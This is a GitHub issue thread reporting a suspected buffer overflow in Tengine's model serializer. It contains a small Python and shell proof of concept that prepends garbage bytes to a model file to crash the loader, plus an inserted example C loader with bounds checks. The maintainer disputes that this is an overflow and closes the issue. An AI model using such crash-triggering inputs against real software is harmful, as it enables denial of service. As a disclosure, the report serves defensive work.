
A buffer overflow is found in serializer #476

Closed
marckwei opened this issue Nov 11, 2020 · 1 comment

Comments


marckwei commented Nov 11, 2020

Vulnerability analysis

We found that in the serializer module, there is a buffer overflow problem.

Link: https://github.com/OAID/Tengine/blob/tengine-lite/src/serializer/tm/tm2_serializer.c

The problem is in the load_model function starting at line 798, which calls the get_tm_file_model function at line 840.

The first parameter mem_base of the get_tm_file_model function points to the address space where the model file is located, and the second parameter is controlled by mem_base. For this project, the model is an input controlled by the user, so the parameters of get_tm_file_model can be controlled.

PoC

Download the official example model, and select the landmark model to demonstrate here.

According to the official use case, the landmark model is run normally, and the program executes normally.

Write 9 bytes of garbage data to the header of the landmark.tmfile file, and then run the landmark model. The program reports a routine error.

Write 10 bytes of garbage data to the header of the landmark.tmfile file, and then run the landmark model. The program crashes.

EXP:

```python
import os

# Work on a copy of the official landmark model
os.system('cp landmark.tmfile test.tmfile')

with open("./test.tmfile", "rb+") as f:
    old = f.read()
    n = 0xA                      # number of garbage bytes to prepend
    print('Writes %d bytes of data to the file header' % n)
    text = b'A' * n
    f.seek(0)
    f.write(text)                # garbage goes in front of the original header
    f.write(old)                 # original contents follow, shifted by n bytes

# Run the landmark example against the modified model
os.system('./attack.sh')
```

attack.sh:

```bash
dir='/mnt/hgfs/starcross/CVE/Tengine-Lite'
export LD_LIBRARY_PATH=$dir/build/install/lib
$dir/build/install/bin/tm_landmark -m $dir/model/landmark/test.tmfile -i $dir/model/landmark/photo.jpg -r 1 -t 1
```
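The scenario the report describes is an offset read from an untrusted model header being used to address into the mapped file. As an added example that is not Tengine's code, the loader below rejects any header whose offsets or lengths fall outside the loaded buffer, so a corrupted header yields a clean error instead of an out-of-bounds read. The header layout (magic "TOY1", then a 32-bit root offset) and the sample files are constructed for illustration and are not the tmfile format.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* Assumed toy header, NOT the real tmfile layout:
 *   bytes 0..3  magic "TOY1"
 *   bytes 4..7  root_offset (u32 LE): where the root table starts
 * root table:   u32 LE length, then `length` bytes of payload           */
static const uint8_t TOY_MAGIC[4] = { 'T', 'O', 'Y', '1' };

/* Returns base+off if [off, off+need) lies inside the buffer, else NULL.
 * Ordered so that neither off+need nor size-off can wrap around.        */
static const uint8_t *checked_at(const uint8_t *base, size_t size,
                                 uint64_t off, size_t need)
{
    if (off > size || need > size - (size_t)off) return NULL;
    return base + off;
}

static uint32_t rd_u32le(const uint8_t *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 |
           (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* 0 = model accepted (root payload length in *root_len), -1 = rejected. */
int toy_load_model(const uint8_t *mem_base, size_t mem_size, uint32_t *root_len)
{
    const uint8_t *hdr = checked_at(mem_base, mem_size, 0, 8);
    if (!hdr || memcmp(hdr, TOY_MAGIC, 4) != 0) return -1;
    uint32_t root_off = rd_u32le(hdr + 4);                  /* untrusted */
    const uint8_t *root = checked_at(mem_base, mem_size, root_off, 4);
    if (!root) return -1;                                   /* offset past EOF */
    uint32_t len = rd_u32le(root);                          /* untrusted */
    if (!checked_at(mem_base, mem_size, (uint64_t)root_off + 4, len)) return -1;
    *root_len = len;
    return 0;
}

/* Constructed sample files: valid; root offset overwritten with 'AAAA';
 * root length claiming more payload than the file holds.                */
static const uint8_t good_model[]      = { 'T','O','Y','1', 8,0,0,0, 4,0,0,0, 1,2,3,4 };
static const uint8_t bad_offset_model[] = { 'T','O','Y','1', 'A','A','A','A', 4,0,0,0, 1,2,3,4 };
static const uint8_t truncated_model[] = { 'T','O','Y','1', 8,0,0,0, 0xFF,0,0,0, 1,2,3,4 };
```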
@cyberfire

@marckwei

Thanks for reporting the potential issue.
A model header with wrong content will cause a program crash, and that is what you observed. I don't think there is any proof of overflow so far.

Please refer to the model format definition: https://github.com/OAID/Tengine/wiki/The-format-of-tmfile

Thanks,

Haitao

@kalcohol kalcohol closed this as completed Mar 3, 2021